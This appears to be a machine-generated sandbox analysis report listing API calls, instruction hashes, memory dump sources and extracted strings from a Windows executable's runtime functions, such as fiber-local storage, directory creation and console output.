                                                                                                                                                                                                  • Instruction ID: d2ebc646bfd008d07da55a8bb9ba20a89be3e0408609e9c567d2c32719bff3f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69F04F61A19F0282EA11AB24E45437A9B20AF867B1FD40635D96D467E4CF2CF44DC720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                                                  • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                  • Instruction ID: 8ccab1ad8002e8d9c28fa8d106187d11915cf6e1f101da5ff3b6a71f580dd9d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1118F36ED8E0301F6543128D456375D9406F54374FA90634EAEE267DACEACB8498130
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA6BF
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA6DE
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA706
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA717
                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF7102D98B3,?,?,00000000,00007FF7102D9B4E,?,?,?,?,?,00007FF7102D9ADA), ref: 00007FF7102DA728
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                  • Opcode ID: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                  • Instruction ID: 66ee5f9612fc759b931c18fd11915d97f656c635c81065c6d0994ecae23fb31f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2276611a630934bbdb354ef1537d91ff3ed6de03a5f5a99dae5237b5b9f36a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F112C22F08A4242FEA87326554257DE9925F987F0F944334E83E067D6DE2CFC098721
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                  • Opcode ID: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                  • Instruction ID: 88c1ea98a126f9ea5c926288430fd52cbdfc497cb9507fb21052a58264344d87
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a5817a23bb51f76ee1afbfff857c957b5c6e4c237a472a6b6273a3da914e048f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B211FA22E09A0746FDA97326645257AAA824F49770FD84734D93E0A3D6ED3CFC495331
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: verbose
                                                                                                                                                                                                  • API String ID: 3215553584-579935070
                                                                                                                                                                                                  • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                  • Instruction ID: 9328dd109421082572245c2f9f642832102b0b34dd5458bdb9688a6387424c74
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B891D033A08EA681F761AE25E45037DBA91AB00BA4FC44136DA9D463D5DFBCFC498321
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                                                  • Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                  • Instruction ID: 29134c811a018837dc5ee0f554d851bd7cd78b66d906a9edc03598593bab3432
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35819073E0CA42C5FBA47F25C110A78BEA0AB11768FD58035CA0D9778ADB2DFD099325
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                                                  • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                  • Instruction ID: b6b447d6b983b8d08ad5bbe403cf915433e04bf022f359c82bb337cf7e29e650
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA51C632B29E0A8ADB14EF15E544679BB91FB44BA8FA08131EA4E43784DF7CF845C710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                                                  • Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                  • Instruction ID: 918e9f2ef7060659ce7f6be0d29e4ae08b8a62b74a9e19b979c1d3995270e9a9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B619032918BC581DB35AB25E5403AAFBA0FB857A4F444225EB9D03B95DF7CF198CB10
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                                                  • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                  • Instruction ID: 1cfa5c91c5d8fc93cc87e7ae6c83fde6226093d678302aa42090633369f1bee9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4951BF32A28A8286EF34AB219244378FBA4EB50BA4F945135DA5D43BD5CF3CF458CB11
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,?,00007FF7102C324C,?,?,00007FF7102C3964), ref: 00007FF7102C7642
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateDirectory
                                                                                                                                                                                                  • String ID: %.*s$%s%c$\
                                                                                                                                                                                                  • API String ID: 4241100979-1685191245
                                                                                                                                                                                                  • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                  • Instruction ID: f1a4b413d3b3a77257b47a7f678ab4d444ef636e31ef44967624b316e8087687
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4831E821629EC585EA21AB24E5107EAA758FF44BF4FD44231EE6D43BC9DE3CE6098710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                  • API String ID: 1878133881-653037927
                                                                                                                                                                                                  • Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                  • Instruction ID: 47f60dfdde2243a8c79ef970cccaf545cd3f9033f38aeb1898e36fa7a5f22e15
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F118E72628E8681EA21AB00E551BAAA768FB44B94FD05136EA8C17744CF3CE609C720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: Error/warning (ANSI fallback)$Warning
                                                                                                                                                                                                  • API String ID: 1878133881-2698358428
                                                                                                                                                                                                  • Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                  • Instruction ID: df67154608e588c9dd93915a649fb08608e411536b62a39ee169e62efbd28813
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A118E62628E8581EA21AB00E551BAAB764FB44B94F905136DA8C17744CF3CE608C760
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                                                  • Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                  • Instruction ID: 2a98f646f3c314e8f2e1ad36929f9eccd7b92f8040ef32d907b9c4db05e83e5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64D1F473B18E81C9E712DF65D4502AC7BB1FB447A8B944236CE5E57B99DE38E80AC310
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _get_daylight$_isindst
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4170891091-0
                                                                                                                                                                                                  • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                  • Instruction ID: d2f1fe19dc8d5431b41f0581ed28859026db63a63f05ffb8b56b3149bfc5822c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5451E673F049118AEF18FF6499856BCABA5AB54378F900235DD2E52BE5DF38F8098710
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2780335769-0
                                                                                                                                                                                                  • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                  • Instruction ID: 0b0285ece993cf520da3bcccbba30a15fcde402c99843d68dce0a853e871825d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D519023E18A418AFB14EF71D4503BDABA1EF58BA8F504136DE0957788DF38E8498720
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554242811.00007FF7102EB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF7102FE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554283177.00007FF710304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554355220.00007FF710306000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff7102c0000_56C7.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                                                  • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                  • Instruction ID: 3953781e4aba4275edbd6fd67cd3e73a19c388bef7d006d2f8485dae59620a51
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16110021E1894241F755A759F64527A9A51EF95BA0FC48032DE4D07B8ECD3DF4CD8520
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1554204786.00007FF7102C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7102C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000B.00000002.1554173267.00007FF7102C0000.00000002.00000001.01000000.00000007.sdmpDownload File
